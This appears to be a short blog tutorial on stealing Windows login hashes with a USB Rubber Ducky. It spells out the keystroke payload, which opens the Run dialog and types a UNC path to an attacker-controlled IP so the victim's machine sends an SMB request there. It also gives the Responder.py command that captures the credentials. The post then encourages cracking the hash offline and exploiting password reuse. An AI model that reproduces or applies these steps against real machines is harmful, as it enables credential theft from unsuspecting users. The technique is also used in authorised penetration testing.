Capturing Hashes – Introduction
I spotted a tweet earlier this week from the Hak5 crew, makers of the USB Rubber Ducky. The tweet was based around capturing Windows hashes with a payload that sends a SMB request from the victim machine to your attack machine.
You can read Hak5’s original post about the topic here:
To get this working successfully, you will need the following:
- USB Rubber Ducky
- Generated Payload
- A server running Responder.py waiting to capture the hashes from the SMB request
Generating the Payload
Hak5 have a publicly available payload generator (Duck Toolkit), which produces a .bat file containing the malicious payload. It’s nice and easy, paste your payload into the generator, click ‘Generate Script’ and then select the file you wish to use (Inject.bin).
In the screenshot above, you can see how simple the payload really is.
REM = Remarks (Notes/Instructions from the author) DELAY = Time to delay (1000 - 1 second) GUI r = Windows run GUI DELAY 100 = Delay 100ms STRING = The text entered into the Windows run GUI - \\<ATTACK IP ADDRESS> ENTER = OK
Place the .bin file onto the micro SD card and get ready to fire it up! But before you do, remember to start responder.py…
Server Running Responder.py
I personally have a cloud hosted server for testing (Ubuntu). Firstly you have to git clone responder.py and then run responder.py as root
sudo python responder.py -I eth0 -fvw
Now Responder is listening, waiting for them sweet, sweet hashes 😀
When you plug the Rubber Ducky USB in the victim’s machine it runs the payload within two seconds, which will look like this:
If they have allowed TCP:445 outbound, you will start to capture the victim’s log in credentials and password hash.
You’re now ready to crack the hash offline! What are the chance the user has the same password for other accounts? Hmmmm!
There’s more mentioned on cracking hashes in one of my other posts – http://18.104.22.168/wifi-hacking/